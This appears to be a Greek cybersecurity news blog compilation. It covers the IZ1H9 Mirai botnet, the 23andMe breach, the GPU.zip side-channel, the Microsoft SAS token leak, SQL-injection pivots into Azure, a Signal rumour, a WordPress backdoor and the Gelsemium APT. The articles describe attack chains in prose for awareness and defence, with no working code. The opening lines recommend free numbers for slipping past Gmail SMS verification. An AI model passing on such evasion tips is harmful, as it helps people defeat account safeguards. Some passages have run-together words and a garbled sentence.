Για να περάσει την επαλήθευση των sms στο gmail παράδειγμα δοκιμάστε της παραπάνω μεθόδους που έγραψα.
Είναι μια μέθοδος που για εμένα δούλεψε, αυτό θα σας βοηθήσει στο να ξεφύγετε ακόμη και να χρειαστεί να χρησιμοποιήσετε έναν αριθμό τηλεφώνου, σας προτείνω αυτή τη μέθοδο.
Μερικά ακόμα links για δωρεάν verifications numbers:
Η παραλλαγή του Mirai DDoS αυξάνει τους στόχους με 13 exploits για δρομολογητές
Ένα botnet κακόβουλου λογισμικού DDoS (distributed denial of service) που βασίζεται στο Mirai και παρακολουθείται ως IZ1H9 έχει προσθέσει δεκατρία νέα ωφέλιμα φορτία για να στοχεύσει δρομολογητές και δρομολογητές που βασίζονται σε Linux από τις εταιρείες D-Link, Zyxel, TP-Link, TOTOLINK και άλλες.
Οι ερευνητές της Fortinet αναφέρουν ότι παρατήρησαν μια κορύφωση στα ποσοστά εκμετάλλευσης γύρω στην πρώτη εβδομάδα του Σεπτεμβρίου, φτάνοντας τις δεκάδες χιλιάδες απόπειρες εκμετάλλευσης εναντίον ευάλωτων συσκευών.
Το IZ1H9 θέτει σε κίνδυνο συσκευές για να τις επιστρατεύσει στο σμήνος DDoS και στη συνέχεια εξαπολύει επιθέσεις DDoS σε συγκεκριμένους στόχους, προφανώς σε πελάτες που νοικιάζουν τη δύναμη πυρός του.
Στόχος IoT συσκευών
Όσο περισσότερες συσκευές και τρωτά σημεία στοχοποιούνται από ένα κακόβουλο λογισμικό DDoS, τόσο αυξάνεται η δυνατότητα δημιουργίας ενός μεγάλου και ισχυρού botnet, ικανού να επιφέρει μαζικά πλήγματα σε ιστότοπους.
Στην περίπτωση του IZ1H9, η Fortinet αναφέρει ότι χρησιμοποιεί exploits για τα ακόλουθα ελαττώματα, που χρονολογούνται από το 2015 έως το 2023:
Η εκστρατεία στοχεύει επίσης σε ένα απροσδιόριστο CVE που σχετίζεται με τη διαδρομή “/cgi-bin/login.cgi”, επηρεάζοντας δυνητικά τον δρομολογητή Prolink PRC2402M.
Αλυσιδωτή επίθεση
Μετά την εκμετάλλευση ενός από τα προαναφερθέντα CVEs, ένα payload IZ1H9 εισάγεται στη συσκευή που περιέχει μια εντολή για την ανάκτηση ενός προγράμματος λήψης σεναρίων shellμε όνομα “l.sh” από μια καθορισμένη διεύθυνση URL.
Κατά την εκτέλεση, το σενάριο διαγράφει τα αρχεία καταγραφής για να αποκρύψει την κακόβουλη δραστηριότητα και, στη συνέχεια, φέρνει πελάτες bot προσαρμοσμένους για διαφορετικές αρχιτεκτονικές συστημάτων.
Τέλος, το σενάριο τροποποιεί τους κανόνες iptables της συσκευής ώστε να εμποδίζει τη σύνδεση σε συγκεκριμένες θύρες και να δυσχεραίνει την αφαίρεση του κακόβουλου λογισμικού από τη συσκευή.
Έχοντας κάνει όλα τα παραπάνω, το bot εγκαθιστά επικοινωνία με τον διακομιστή C2 (command and control) και περιμένει την εκτέλεση εντολών.
Οι υποστηριζόμενες εντολές αφορούν τον τύπο της επίθεσης DDoS που θα εξαπολύσει, συμπεριλαμβανομένων των UDP, UDP Plain, HTTP Flood και TCP SYN.
Η Fortinet αναφέρει επίσης ότι το IZ1H9 διαθέτει ένα τμήμα δεδομένων με σκληρά κωδικοποιημένα διαπιστευτήρια που χρησιμοποιούνται για επιθέσεις brute-force.
Αυτές οι επιθέσεις μπορεί να είναι χρήσιμες για τη διάδοση σε παρακείμενες συσκευές ή για τον έλεγχο ταυτότητας σε συσκευές IoT για τις οποίες δεν υπάρχει λειτουργικό exploit.
Συνιστάται στους κατόχους συσκευών IoT να χρησιμοποιούν ισχυρά διαπιστευτήρια χρήστη διαχειριστή, να τις ενημερώνουν στην τελευταία διαθέσιμη έκδοση υλικολογισμικού και, αν είναι δυνατόν, να μειώνουν την έκθεσή τους στο δημόσιο διαδίκτυο.
Ασφαλής χρήση παιχνιδιών εικονικής πραγματικότητας
Οι γονείς πρέπει να γνωρίζουντα παιχνίδια εικονικής πραγματικότητας (δηλαδήτις υπηρεσίες και τα προϊόντα που προσφέρουν)καιναέχουνεπίγνωσητουτρόπουμετονοποίο τα παιδιά τουςπερνούν το χρόνο τους στο διαδίκτυο.
Ενεργοποιήστε το λογαριασμό του παιδιού σας στο επιλεγμένο παιχνίδι εικονικής πραγματικότητας χρησιμοποιώντας το emailσας.
Ελέγξτε ανυπάρχουνεργαλείαγονικούελέγχουήφιλτραρίσματοςτουδιαδικτύουστονεικονικόκόσμοπου χρησιμοποιεί το παιδί και βεβαιωθείτε ότι τα εργαλεία αυτάείναιενεργοποιημένα.Ηεπαλήθευσητης ηλικίας πραγματοποιείται συνήθως κατά την αγορά ενόςπροϊόντος.Προςτο παρόν δεν υπάρχει σύστημα που να εγγυάται την επαλήθευση της ηλικίας.
Υπάρχουν εργαλεία που εμποδίζουν την πρόσβαση σε ανεπιθύμητους ιστότοπους.Συνιστάταιηχρήσητους.
Ηεπεξεργασία ευαίσθητων προσωπικών δεδομένων, η πρόσβαση σε δωμάτια συνομιλίας,ηαποστολή διαφημιστικών μηνυμάτωνηλεκτρονικούταχυδρομείου,η επικοινωνία με παιδιά μέσω κινητού τηλεφώνου, ησυλλογή δεδομένωνπαιδιών στοδιαδίκτυοκαι ηχρήση των δεδομένωνγια διαφημιστικούς σκοπούςαπαιτούνσυνήθωςτησυγκατάθεση των γονέων. Εξετάστε προσεκτικά αυτές τις επιλογές.
Σοβαρή Διαρροή Δεδομένων από την 23andMe: Επηρεάζονται 6.9 Εκατομμύρια Μέλη
Η εταιρεία γενετικής ανάλυσης 23andMe, επιβεβαίωσε ότι χάκερ, χρησιμοποιώντας κλεμμένους κωδικούς πρόσβασης, απέκτησαν πρόσβαση στις προσωπικές πληροφορίες περίπου 6,9 εκατομμυρίων μελών της.
Ενώ οι χάκερ κατάφεραν να εισέλθουν σε περίπου 14.000 λογαριασμούς, ήτοι το 0,1% των πελατών της, κατάφεραν να δουν πληροφορίες που είχαν μοιραστεί από συγγενείς με γενετικούς δεσμούς στην 23andMe, δήλωσε εκπρόσωπος.
Η 23andMe βρίσκεται σε εξέλιξη ενημέρωσης των πελατών που επηρεάστηκαν και έχει ενισχύσει την ασφάλεια των λογαριασμών απαιτώντας από τους χρήστες να δημιουργήσουν νέους κωδικούς πρόσβασης και φυσικά προστασία 2fa.
Από τους 6,9 εκατομμύρια λογαριασμούς που κατάφεραν να πάρουν πρόσβαση, στους 5,5 εκατομμύρια λογαριασμούς περιείχαν πληροφορίες για γενετικούς συγγενείς και ενδέχεται επίσης να περιλαμβάνουν ημερομηνίες γέννησης και τοποθεσίες, αν είχαν καταχωρηθεί από τους χρήστες, σύμφωνα με την 23andMe.
Η 23andMe ιδρύθηκε το 2006 και έχει έδρα στο Mountain View, Καλιφόρνια, όπου βρίσκεται και η έδρα της Google.
Οι Σύγχρονες GPU είναι ευάλωτες σε επιθέσεις GPU.zip side-channel
Ερευνητές από τέσσερα αμερικανικά πανεπιστήμια ανέπτυξαν μια νέα επίθεση δευτερεύοντος καναλιού GPU που αξιοποιεί τη συμπίεση δεδομένων για να διαρρεύσουν ευαίσθητα οπτικά δεδομένα από τις σύγχρονες κάρτες γραφικών κατά την επίσκεψη σε ιστοσελίδες.
Οι ερευνητές απέδειξαν την αποτελεσματικότητα αυτής της επίθεσης “GPU.zip” εκτελώντας επιθέσεις κλοπής pixel από φίλτρο SVG cross-origin μέσω του προγράμματος περιήγησης Chrome.
Οι ερευνητές αποκάλυψαν την ευπάθεια στους επηρεαζόμενους κατασκευαστές καρτών γραφικών τον Μάρτιο του 2023. Ωστόσο, μέχρι τον Σεπτέμβριο του 2023, κανένας από τους επηρεαζόμενους προμηθευτές GPU (AMD, Apple, Arm, NVIDIA, Qualcomm) ή η Google (Chrome) δεν έχουν κυκλοφορήσει διορθώσεις για την αντιμετώπιση του προβλήματος.
Το νέο ελάττωμα περιγράφεται σε έγγραφο από ερευνητές του Πανεπιστημίου του Τέξας στο Όστιν, του Πανεπιστημίου Carnegie Mellon, του Πανεπιστημίου της Ουάσινγκτον και του Πανεπιστημίου του Ιλινόις Urbana-Champaign και θα δημοσιευτεί στο 45ο Συμπόσιο IEEE για την Ασφάλεια και την Ιδιωτικότητα.
Διαρροή μέσω συμπίεσης
Γενικά, η συμπίεση δεδομένων δημιουργεί ξεχωριστή κίνηση DRAM και χρήση κρυφής μνήμης, η οποία μπορεί να χρησιμοποιηθεί για διαρροή μυστικών, οπότε το λογισμικό απενεργοποιεί τη συμπίεση όταν χειρίζεται ευαίσθητα δεδομένα.
Οι ερευνητές του GPU.zip εξηγούν ότι όλες οι σύγχρονες μονάδες επεξεργαστών γραφικών, ειδικά τα ενσωματωμένα τσιπ της Intel και της AMD, εκτελούν συμπίεση δεδομένων που είναι ορατή από το λογισμικό, ακόμη και όταν δεν τους ζητείται ρητά.
Οι σύγχρονες GPU ακολουθούν αυτή την επικίνδυνη πρακτική ως στρατηγική βελτιστοποίησης, καθώς βοηθά στην εξοικονόμηση εύρους ζώνης μνήμης και στη βελτίωση των επιδόσεων χωρίς λογισμικό.
Αυτή η συμπίεση είναι συχνά μη τεκμηριωμένη και ειδική για τον προμηθευτή και οι ερευνητές βρήκαν έναν τρόπο να την εκμεταλλευτούν για να διαρρεύσουν οπτικά δεδομένα από τις GPU.
Συγκεκριμένα, παρουσίασαν μια επίθεση που εξάγει μεμονωμένα δεδομένα pixel μέσω ενός προγράμματος περιήγησης στο διαδίκτυο σε διάφορες συσκευές και αρχιτεκτονικές GPU, όπως φαίνεται παρακάτω.
Η proof-of-concept επίθεση επιδεικνύει την κλοπή του ονόματος χρήστη από ένα iframe της Wikipedia, η οποία είναι δυνατή μέσα σε 30 λεπτά σε Ryzen και 215 λεπτά σε Intel GPU, με ακρίβεια 97% και 98,3%, αντίστοιχα.
Το iframe φιλοξενεί μια διασταυρούμενη ιστοσελίδα της οποίας τα pixel απομονώνονται και μετατρέπονται σε δυαδικά, δηλαδή μετατρέπονται σε δύο πιθανά χρώματα.
Στη συνέχεια, αυτά τα εικονοστοιχεία μεγεθύνονται και εφαρμόζεται μια εξειδικευμένη στοίβα φίλτρων SVG για τη δημιουργία υφών που είναι είτε συμπιέσιμες είτε όχι. Μετρώντας τον χρόνο που απαιτείται για την απόδοση της υφής, οι ερευνητές μπορούν να συμπεράνουν το αρχικό χρώμα/κατάσταση του εικονοστοιχείου-στόχου.
Πρόσφατα είδαμε την εφαρμογή των φίλτρων SVG για την πρόκληση εκτέλεσης που εξαρτάται από τα δεδομένα και τη χρήση της JavaScript για τη μέτρηση του χρόνου και της συχνότητας υπολογισμού για τη διάκριση του χρώματος του εικονοστοιχείου στην επίθεση “Hot Pixels”.
Ενώ το Hot Pixels εκμεταλλεύεται τους εξαρτώμενους από τα δεδομένα χρόνους υπολογισμού στους σύγχρονους επεξεργαστές, το GPU.zip στηρίζεται στην ατεκμηρίωτη συμπίεση δεδομένων της GPU για να επιτύχει παρόμοια αποτελέσματα.
Η σοβαρότητα του GPU.zip
Το GPU.zip επηρεάζει σχεδόν όλους τους μεγάλους κατασκευαστές GPU, συμπεριλαμβανομένων των AMD, Apple, Arm, Intel, Qualcomm και NVIDIA, αλλά δεν επηρεάζονται εξίσου όλες οι κάρτες.
Το γεγονός ότι κανένας από τους επηρεαζόμενους κατασκευαστές δεν έχει αποφασίσει να διορθώσει το πρόβλημα βελτιστοποιώντας την προσέγγιση συμπίεσης δεδομένων και περιορίζοντας τη λειτουργία της σε μη ευαίσθητες περιπτώσεις αυξάνει περαιτέρω τον κίνδυνο.
Αν και το GPU.zip επηρεάζει δυνητικά τη συντριπτική πλειονότητα των φορητών υπολογιστών, των smartphones, των tablet και των επιτραπέζιων υπολογιστών παγκοσμίως, ο άμεσος αντίκτυπος στους χρήστες μετριάζεται από την πολυπλοκότητα και το χρόνο που απαιτείται για την εκτέλεση της επίθεσης.
Επίσης, οι ιστότοποι που αρνούνται την ενσωμάτωση iframe cross-origin δεν μπορούν να χρησιμοποιηθούν για τη διαρροή δεδομένων χρηστών μέσω αυτής ή παρόμοιων επιθέσεων πλευρικού καναλιού.
“Οι περισσότεροι ευαίσθητοι ιστότοποι αρνούνται ήδη την ενσωμάτωση από ιστότοπους cross-origin. Ως αποτέλεσμα, δεν είναι ευάλωτες στην επίθεση κλοπής pixel που τοποθετήσαμε χρησιμοποιώντας το GPU.zip”, εξηγούν οι ερευνητές σε ένα FAQ στον ιστότοπο της ομάδας.
Τέλος, οι ερευνητές σημειώνουν ότι ο Firefox και ο Safari δεν πληρούν όλα τα κριτήρια που απαιτούνται για να λειτουργήσει το GPU.zip, όπως η δυνατότητα φόρτωσης cross-origin iframes με cookies, η απόδοση φίλτρων SVG σε iframes και η ανάθεση εργασιών rendering στη GPU.
38TB δεδομένων εκτέθηκαν κατά λάθος από τους ερευνητές AI της Microsoft
Έναςερευνητής τεχνητής νοημοσύνης της Microsoft διέρρευσε κατά λάθος δεκάδες terabytes ευαίσθητων δεδομένων, συμπεριλαμβανομένων μυστικών κλειδιών και κωδικών πρόσβασης, ενώ δημοσίευσε έναν κάδο αποθήκευσης δεδομένων εκπαίδευσης ανοικτού κώδικα στο GitHub. Σε μια έρευνα που μοιράστηκε με το TechCrunch, η νεοσύστατη εταιρεία ασφάλειας cloud Wiz δήλωσε ότι ανακάλυψε το αποθετήριο GitHub που ανήκε στο τμήμα έρευνας AI της Microsoft στο πλαίσιο των συνεχιζόμενων εργασιών της σχετικά με την τυχαία έκθεση δεδομένων που φιλοξενούνται στο cloud.
Οι αναγνώστες του αποθετηρίου GitHub, το οποίο παρέχει κώδικα ανοικτού κώδικα και μοντέλα AI για την αναγνώριση εικόνων, έλαβαν οδηγίες να κατεβάσουν τα μοντέλα από μια διεύθυνση URL Azure Storage. Ωστόσο, η Wiz ανακάλυψε ότι αυτή η διεύθυνση URL είχε ρυθμιστεί ώστε να δίνειάδειαπρόσβασης σε ολόκληρο το λογαριασμό αποθήκευσης, εκθέτοντας κατά λάθος περαιτέρωπροσωπικά δεδομένα.
Τα δεδομένα περιλάμβανανκωδικούςπρόσβασης για υπηρεσίες της Microsoft, μυστικάκλειδιά και άλλα ευαίσθητα προσωπικά δεδομένα, συμπεριλαμβανομένων περισσότερων από 30.000 εσωτερικών μηνυμάτων του Microsoft Teams από εκατοντάδες υπαλλήλους της Microsoft.
Σύμφωναμετην Wiz, οιδιευθύνσειςURLστιςοποίες δημοσιεύθηκαν αυτά τα δεδομένα μετά το 2020είχανρυθμιστεί λανθασμένα ώστε να επιτρέπουν δικαιώματα “Πλήρους ελέγχου” αντί για “Μόνο για ανάγνωση”, γεγονόςπουθαμπορούσεναεπιτρέψεισεοποιονδήποτεήξερε πού να κοιτάξει να διαγράψει, να αντικαταστήσει ή να εισάγει κακόβουλο περιεχόμενο Ηεταιρεία δήλωσε ότι αυτό συνέβη.
Η Wiz επισημαίνει ότι ο λογαριασμός αποθήκευσης δεν ήταν άμεσα εκτεθειμένος-ταSAStokensείναι ένας μηχανισμός τηςAzure που επιτρέπει στους χρήστες να δημιουργούν κοινόχρηστους συνδέσμους γιαπρόσβαση σε δεδομένα στολογαριασμότους Azure Storage.
Η Wiz κοινοποίησετα ευρήματά της στηMicrosoft στις 22 Ιουνίου και η Microsoft δήλωσεότισυνέλεξετα κουπόνια SAS δύο ημέρες αργότερα, στις 24 Ιουνίου. Η Microsoft δήλωσε ότι ολοκλήρωσε την έρευνά της σχετικά με τις πιθανές οργανωτικές επιπτώσεις στις 16 Αυγούστου. Σε μια ανάρτηση στο blog που μοιράστηκε με το TechCrunch πριν από τη δημοσίευση, το Κέντρο Απόκρισης Ασφάλειας της Microsoft δήλωσε ότι “δεν εκτέθηκαν δεδομένα πελατών ωςαποτέλεσμααυτούτουπροβλήματοςκαιδενπαραβιάστηκανάλλεςεσωτερικέςυπηρεσίες.“Ωςαποτέλεσμα της έρευνας της Wiz, ηMicrosoftεπιβεβαίωσεότιτοGitHub‘sSecret Spanning Service, η οποία,όπως είπε, είχε επεκταθεί. Η υπηρεσία παρακολουθεί τις αλλαγές σεόλους τους δημόσιους κώδικες ανοικτού κώδικα καιδημοσιεύειδιαπιστευτήριακαι άλλαμυστικά σε απλό κείμενο, συμπεριλαμβανομένωντωνμαρκώνSAS που ενδέχεται να έχουν υπερβολικά επιτρεπτικέςημερομηνίεςλήξηςκαι δικαιώματα.
Οι χάκερς στοχεύουν Azure cloud VMs μέσω παραβιασμένων διακομιστών SQL
Οι χάκερς έχουν παρατηρηθεί να προσπαθούν να παραβιάσουν περιβάλλοντα cloud μέσω των Microsoft SQL Servers που είναι ευάλωτοι σε SQL injection.
Οι ερευνητές ασφαλείας της Microsoft αναφέρουν ότι αυτή η τεχνική πλευρικής κίνησης έχει παρατηρηθεί στο παρελθόν σε επιθέσεις σε άλλες υπηρεσίες όπως VMs και Kubernetes clusters.
Ωστόσο, είναι η πρώτη φορά που βλέπουν SQL Servers να αξιοποιούνται για αυτόν τον σκοπό.
Αλυσιδωτή επίθεση
Οι επιθέσεις που παρατήρησε η Microsoft ξεκινούν με την εκμετάλλευση μιας ευπάθειας έγχυσης SQL σε μια εφαρμογή στο περιβάλλον του στόχου.
Αυτό επιτρέπει στους φορείς απειλής να αποκτήσουν πρόσβαση στην παρουσία του SQL Server που φιλοξενείται στην εικονική μηχανή Azure με αυξημένα δικαιώματα για την εκτέλεση εντολών SQL και την εξαγωγή πολύτιμων δεδομένων.
Αυτά περιλαμβάνουν δεδομένα σχετικά με βάσεις δεδομένων, ονόματα πινάκων, σχήματα, εκδόσεις βάσεων δεδομένων, ρυθμίσεις δικτύου και δικαιώματα ανάγνωσης/εγγραφής/διαγραφής.
Εάν η παραβιασμένη εφαρμογή έχει αυξημένα δικαιώματα, οι επιτιθέμενοι μπορούν να ενεργοποιήσουν την εντολή ‘xp_cmdshell’ για την εκτέλεση εντολών του λειτουργικού συστήματος (OS) μέσω SQL, δίνοντάς τους ένα κέλυφος στον κεντρικό υπολογιστή.
Οι εντολές που εκτελούνται από τους επιτιθέμενους σε αυτό το στάδιο περιλαμβάνουν τις εξής:
Ανάγνωση καταλόγων, απαρίθμηση διεργασιών και έλεγχος κοινοτήτων δικτύου.
Λήψη κωδικοποιημένων και συμπιεσμένων εκτελέσιμων αρχείων και σεναρίων PowerShell.
Ρυθμίστε μια προγραμματισμένη εργασία για την εκκίνηση ενός backdoor script.
Ανάκτηση των διαπιστευτηρίων χρήστη με απόρριψη των κλειδιών μητρώου SAM και SECURITY.
Διασπάστε δεδομένα χρησιμοποιώντας μια μοναδική μέθοδο που περιλαμβάνει τη δωρεάν υπηρεσία “webhook.site”, η οποία διευκολύνει την επιθεώρηση και την αποσφαλμάτωση αιτημάτων HTTP και μηνυμάτων ηλεκτρονικού ταχυδρομείου.
Η χρήση μιας νόμιμης υπηρεσίας για την εκροή δεδομένων καθιστά τη δραστηριότητα λιγότερο πιθανό να φανεί ύποπτη ή να προκαλέσει προβλήματα στα προϊόντα ασφαλείας, επιτρέποντας στους επιτιθέμενους να κλέψουν διακριτικά δεδομένα από τον κεντρικό υπολογιστή.
Στη συνέχεια, οι επιτιθέμενοι επιχείρησαν να εκμεταλλευτούν την ταυτότητα cloud της παρουσίας του SQL Server για να αποκτήσουν πρόσβαση στο IMDS (Instant Metadata Service) και να αποκτήσουν το κλειδί πρόσβασης στην ταυτότητα cloud.
Στο Azure, στους πόρους συχνά εκχωρούνται διαχειριζόμενες ταυτότητες για τον έλεγχο ταυτότητας με άλλους πόρους και υπηρεσίες cloud. Εάν οι επιτιθέμενοι κατέχουν αυτό το κλειδί, μπορούν να το χρησιμοποιήσουν για να αποκτήσουν πρόσβαση σε οποιονδήποτε πόρο cloud, στον οποίο η ταυτότητα έχει δικαιώματα.
Η Microsoft αναφέρει ότι οι επιτιθέμενοι δεν κατάφεραν να αξιοποιήσουν επιτυχώς αυτή την τεχνική λόγω σφαλμάτων, αλλά η προσέγγιση παραμένει έγκυρη και αποτελεί τρομερή απειλή για τους οργανισμούς.
Τέλος, οι φορείς της απειλής διέγραψαν όλα τα σενάρια που κατέβασαν και έσβησαν τις προσωρινές τροποποιήσεις της βάσης δεδομένων για να σβήσουν τα ίχνη της επίθεσης.
Συμβουλές Προστασίας
Η Microsoft προτείνει τη χρήση του Defender for Cloud και του Defender for Endpoint για να εντοπίσετε τις ενέσεις SQL και την ύποπτη δραστηριότητα SQLCMD, που χρησιμοποιήθηκαν και οι δύο στην επίθεση που παρατηρήθηκε.
Για τον μετριασμό της απειλής, η Microsoft συνιστά την εφαρμογή της αρχής των λιγότερων προνομίων κατά τη χορήγηση δικαιωμάτων χρήστη, η οποία πάντα προσθέτει τριβή στις προσπάθειες πλευρικής μετακίνησης.
Η Signal αναφέρει ότι το σφάλμα Zero-day δεν είναι πραγματικό
Το Signal messenger διερεύνησε τις φήμες που εξαπλώθηκαν στο διαδίκτυο το Σαββατοκύριακο σχετικά με μια ευπάθεια ασφαλείας μηδενικής ημέρας που σχετίζεται με τη λειτουργία “Δημιουργία προεπισκόπησης συνδέσμου”, δηλώνοντας ότι δεν υπάρχει καμία απόδειξη ότι αυτή η ευπάθεια είναι πραγματική.
Αφού επικοινώνησαν με τη Signal σχετικά με το zero-day χθες το βράδυ, δημοσίευσαν μια δήλωση στο Twitter, στην οποία αναφέρουν ότι διερεύνησαν τις φήμες και δεν βρήκαν καμία απόδειξη ότι αυτό το ελάττωμα είναι πραγματικό.
Επικαλούμενη κυβερνητικές πηγές των ΗΠΑ, η είδηση του Zero-day εξαπλώθηκε γρήγορα στο διαδίκτυο και στην κοινότητα κυβερνοασφάλειας το απόγευμα του Σαββάτου.
Αυτές οι ανώνυμες πηγές της κυβέρνησης των ΗΠΑ δήλωσαν ότι η ευπάθεια μπορεί να μετριαστεί με την απενεργοποίηση της ρύθμισης “Generate Link Previews” στο Signal.
Ενώ το Signal έχει δηλώσει ότι δεν έχει αποδείξεις για ένα νέο zero-day, εξακολουθεί να ζητάει από όσους έχουν νέες και “πραγματικές” πληροφορίες να επικοινωνήσουν με την ομάδα ασφαλείας της.
Καθώς πρόκειται για μια συνεχιζόμενη έρευνα και ο μετριασμός είναι απλά η απενεργοποίηση της λειτουργίας Link Previews, οι χρήστες ίσως θελήσουν να απενεργοποιήσουν αυτή τη ρύθμιση προς το παρόν μέχρι να επιβεβαιωθεί πλήρως ότι δεν είναι πραγματική.
Νέο backdoor του WordPress δημιουργεί λογαριασμό διαχειριστή για να κλέψει ιστότοπους
Ένα νέο κακόβουλο λογισμικό παριστάνει το νόμιμο πρόσθετο προσωρινής αποθήκευσης για να στοχεύσει ιστότοπους WordPress, επιτρέποντας στους φορείς απειλών να δημιουργήσουν έναν λογαριασμό διαχειριστή και να ελέγχουν τη δραστηριότητα του ιστότοπου.
Το κακόβουλο λογισμικό είναι μια κερκόπορτα με διάφορες λειτουργίες που του επιτρέπουν να διαχειρίζεται τα πρόσθετα και να κρύβεται από τα ενεργά στις παραβιασμένες ιστοσελίδες, να αντικαθιστά περιεχόμενο ή να ανακατευθύνει ορισμένους χρήστες σε κακόβουλες τοποθεσίες.
Λεπτομέρειες ψεύτικου πρόσθετου
Οι αναλυτές της Defiant, των κατασκευαστών του πρόσθετου ασφαλείας Wordfence για το WordPress, ανακάλυψαν το νέο κακόβουλο λογισμικό τον Ιούλιο κατά τον καθαρισμό ενός ιστότοπου.
Ρίχνοντας μια πιο προσεκτική ματιά στο backdoor, οι ερευνητές παρατήρησαν ότι ερχόταν “με ένα επαγγελματικής εμφάνισης εναρκτήριο σχόλιο” για να μεταμφιεστεί ως εργαλείο caching, το οποίο συνήθως βοηθά στη μείωση της καταπόνησης του διακομιστή και στη βελτίωση των χρόνων φόρτωσης της σελίδας.
Η απόφαση να μιμηθεί ένα τέτοιο εργαλείο φαίνεται σκόπιμη, διασφαλίζοντας ότι θα περάσει απαρατήρητο κατά τη διάρκεια χειροκίνητων ελέγχων. Επίσης, το κακόβουλο πρόσθετο έχει ρυθμιστεί να αποκλείει τον εαυτό του από τη λίστα των “ενεργών πρόσθετων” ως μέσο για να αποφύγει τον έλεγχο.
Το κακόβουλο λογισμικό διαθέτει τις ακόλουθες δυνατότητες:
User creation – Μια συνάρτηση δημιουργεί έναν χρήστη με όνομα ‘superadmin’ με σκληρά κωδικοποιημένο κωδικό πρόσβασης και δικαιώματα επιπέδου διαχειριστή, ενώ μια δεύτερη συνάρτηση μπορεί να αφαιρέσει αυτόν τον χρήστη για να σβήσει τα ίχνη της μόλυνσης.
Bot detection – Όταν οι επισκέπτες αναγνωρίζονταν ως bots (π.χ. ανιχνευτές μηχανών αναζήτησης), το κακόβουλο λογισμικό τους παρείχε διαφορετικό περιεχόμενο, όπως spam, προκαλώντας τους να ευρετηριάσουν τον παραβιασμένο ιστότοπο για κακόβουλο περιεχόμενο. Ως εκ τούτου, οι διαχειριστές θα μπορούσαν να δουν μια ξαφνική αύξηση της επισκεψιμότητας ή αναφορές από χρήστες που διαμαρτύρονται για ανακατεύθυνση σε κακόβουλες τοποθεσίες.
Content replacement – Το κακόβουλο λογισμικό μπορεί να μεταβάλλει τις αναρτήσεις και το περιεχόμενο της σελίδας και να εισάγει συνδέσμους ή κουμπιά spam. Στους διαχειριστές του ιστότοπου σερβίρεται μη τροποποιημένο περιεχόμενο για να καθυστερήσει η υλοποίηση της παραβίασης.
Plugin control – Οι χειριστές του κακόβουλου λογισμικού μπορούν να ενεργοποιήσουν ή να απενεργοποιήσουν εξ αποστάσεως αυθαίρετα πρόσθετα του WordPress στον ιστότοπο που έχει παραβιαστεί. Επίσης, καθαρίζει τα ίχνη του από τη βάση δεδομένων του ιστότοπου, έτσι ώστε η δραστηριότητα αυτή να παραμένει κρυφή.
Remote invocation – Το backdoor ελέγχει για συγκεκριμένες συμβολοσειρές του πράκτορα χρήστη, επιτρέποντας στους επιτιθέμενους να ενεργοποιούν εξ αποστάσεως διάφορες κακόβουλες λειτουργίες.
Προς το παρόν, η Defiant δεν παρέχει λεπτομέρειες σχετικά με τον αριθμό των ιστότοπων που έχουν παραβιαστεί με το νέο κακόβουλο λογισμικό και οι ερευνητές της δεν έχουν ακόμη προσδιορίσει τον αρχικό φορέα πρόσβασης.
Οι τυπικές μέθοδοι παραβίασης ενός ιστότοπου περιλαμβάνουν κλεμμένα διαπιστευτήρια, brute-forcing κωδικών πρόσβασης ή εκμετάλλευση ευπάθειας σε υπάρχον πρόσθετο ή θέμα.
Η Defiant κυκλοφόρησε μια υπογραφή ανίχνευσης για τους χρήστες της δωρεάν έκδοσης του Wordfence και πρόσθεσε έναν κανόνα τείχους προστασίας για την προστασία των χρηστών Premium, Care και Response από την κερκόπορτα.
Ως εκ τούτου, οι ιδιοκτήτες ιστότοπων θα πρέπει να χρησιμοποιούν ισχυρά και μοναδικά διαπιστευτήρια για τους λογαριασμούς διαχειριστών, να διατηρούν τα πρόσθετα τους ενημερωμένα και να αφαιρούν αχρησιμοποίητα πρόσθετα και χρήστες.
Η ομάδα hackers Evasive Gelsemium εντοπίστηκε σε επίθεση κατά της ασιατικής κυβέρνησης
Μια προηγμένη απειλή (APT) που εντοπίστηκε ως Gelsemium παρατηρήθηκε σε επιθέσεις με στόχο μια κυβέρνηση της Νοτιοανατολικής Ασίας που διήρκεσαν έξι μήνες μεταξύ 2022 και 2023.
Η Gelsemium είναι μια ομάδα κυβερνοκατασκοπείας που λειτουργεί από το 2014 και στοχεύει κυβερνήσεις, εκπαιδευτικούς φορείς και κατασκευαστές ηλεκτρονικών ειδών στην Ανατολική Ασία και τη Μέση Ανατολή.
Η έκθεση της ESET από το 2021 χαρακτηρίζει την ομάδα απειλών ως “αθόρυβη”, υπογραμμίζοντας την τεράστια τεχνική ικανότητα και τις γνώσεις προγραμματισμού που τη βοήθησαν να πετάξει κάτω από το ραντάρ για πολλά χρόνια.
Μια νέα έκθεση της Μονάδας 42 της Palo Alto Network αποκαλύπτει πώς μια νέα εκστρατεία της Gelsemium χρησιμοποιεί σπάνια παρατηρούμενα backdoors που συνδέονται με τους φορείς απειλής με μέτρια εμπιστοσύνη.
Πρόσφατες επιθέσεις της Gelsemium
Η αρχική παραβίαση των στόχων της Gelsemium επιτεύχθηκε μέσω της εγκατάστασης κελυφών ιστού, πιθανότατα μετά την εκμετάλλευση ευπαθειών σε διακομιστές που έχουν πρόσβαση στο διαδίκτυο.
Η Μονάδα 42 αναφέρει ότι είδε τα κελύφη ιστού “reGeorg”, “China Chopper” και “AspxSpy”, τα οποία είναι δημόσια διαθέσιμα και χρησιμοποιούνται από πολλές ομάδες απειλών, καθιστώντας την απόδοση δύσκολη.
Χρησιμοποιώντας αυτά τα κελύφη ιστού, το Gelsemium πραγματοποίησε βασική αναγνώριση δικτύου, μετακινήθηκε πλευρικά μέσω SMB και ανέκτησε πρόσθετα ωφέλιμα φορτία.
Αυτά τα πρόσθετα εργαλεία που βοηθούν στην πλευρική μετακίνηση, τη συλλογή δεδομένων και την κλιμάκωση προνομίων περιλαμβάνουν τα OwlProxy, SessionManager, Cobalt Strike, SpoolFool και EarthWorm.
Το Cobalt Strike είναι μια ευρέως χρησιμοποιούμενη σουίτα δοκιμών διείσδυσης, το EarthWorm είναι ένας δημόσια διαθέσιμος tunneler SOCKS και το SpoolFool είναι ένα τοπικό εργαλείο κλιμάκωσης προνομίων ανοικτού κώδικα, οπότε αυτά τα τρία δεν αφορούν ειδικά το Gelsemium.
Ωστόσο, το OwlProxy είναι ένα μοναδικό, προσαρμοσμένο εργαλείο HTTP proxy και backdoor της Μονάδας 42 αναφέρει ότι το Gelsemium το χρησιμοποίησε σε μια παλαιότερη επίθεση με στόχο την κυβέρνηση της Ταϊβάν.
